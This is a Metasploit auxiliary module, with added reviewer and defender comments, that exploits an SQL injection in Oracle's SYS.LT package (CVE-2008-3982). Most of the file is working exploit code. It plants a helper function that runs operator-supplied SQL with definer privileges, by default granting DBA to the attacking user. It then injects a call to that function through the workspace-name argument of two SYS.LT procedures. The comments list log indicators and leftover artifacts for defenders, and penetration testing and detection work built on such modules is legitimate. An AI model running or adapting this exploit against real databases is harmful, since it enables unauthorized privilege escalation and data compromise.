Path: blob/master/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb
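##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2008-3982: SQL injection through the workspace-name
# argument of procedures in the Oracle PL/SQL package SYS.LT.
#
# Notes for defenders and reviewers:
# - The advisory referenced below is Oracle's October 2008 Critical Patch
#   Update (see 'References').
# - Per the module description, the only stated precondition is EXECUTE
#   privilege on the vulnerable package, so reviewing who holds that grant
#   narrows exposure.
# - The module declares 'SideEffects' => [IOC_IN_LOGS]. The statements it sends
#   are: a CREATE OR REPLACE FUNCTION with a one-letter uppercase name
#   (AUTHID CURRENT_USER, PRAGMA AUTONOMOUS_TRANSACTION, EXECUTE IMMEDIATE),
#   calls to SYS.LT.CREATEWORKSPACE and SYS.LT.COMPRESSWORKSPACETREE whose
#   workspace argument contains an embedded quote followed by " and ", and
#   possibly a DROP FUNCTION for the same name.
# - The helper function is dropped only when one of the two calls raises an
#   error whose text contains "No Data"; on any other outcome it is left in
#   place and is itself an artifact worth looking for.
#
# NOTE(review): the module name and the status message say COMPRESSWORKSPACE,
# while the second statement actually calls SYS.LT.COMPRESSWORKSPACETREE.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE

  # Registers the module metadata and its single option, SQL.
  #
  # @param info [Hash] metadata overrides merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE',
        'Description' => %q{
          This module exploits an sql injection flaw in the COMPRESSWORKSPACE
          procedure of the PL/SQL package SYS.LT. Any user with execute
          privilege on the vulnerable package can exploit this vulnerability.
        },
        'Author' => [ 'CG' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2008-3982'],
          [ 'OSVDB', '49324'],
          [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ]
        ],
        'DisclosureDate' => '2008-10-13',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    # NOTE(review): the default string is interpolated once, here, from
    # whatever DBUSER holds when the options are registered -- confirm that
    # this is the intended value.
    register_options(
      [
        OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),
      ]
    )
  end

  # Sends the helper function, then the two SYS.LT calls, and removes the
  # helper function when the calls fail with a "No Data" error.
  #
  # Returns early when check_dependencies is falsy.
  def run
    return unless check_dependencies

    # Random identifiers: `name` is the workspace name (1..10 uppercase
    # letters), `cruft` is the one-letter helper function name that is also
    # used as the function's return value.
    name = Rex::Text.rand_text_alpha_upper(1..10)
    cruft = Rex::Text.rand_text_alpha_upper(1)

    # Helper function carrying the operator-supplied SQL option verbatim.
    function = "
      CREATE OR REPLACE FUNCTION #{cruft}
      RETURN VARCHAR2 AUTHID CURRENT_USER
      AS
      PRAGMA AUTONOMOUS_TRANSACTION;
      BEGIN
      EXECUTE IMMEDIATE '#{datastore['SQL']}';
      COMMIT;
      RETURN '#{cruft}';
      END;"

    # Both calls pass the same workspace argument; only the procedure differs.
    package1 = "BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"

    package2 = "BEGIN SYS.LT.COMPRESSWORKSPACETREE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"

    clean = "DROP FUNCTION #{cruft}"

    print_status('Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...')

    print_status('Sending function...')
    prepare_exec(function)

    begin
      prepare_exec(package1)
      prepare_exec(package2)
    rescue StandardError => e
      # Any error other than "No Data" ends the run without cleanup, which
      # leaves the helper function behind in the schema.
      return unless e.to_s.match?(/No Data/)

      print_status("Removing function '#{cruft}'...")
      prepare_exec(clean)
    end
  end
end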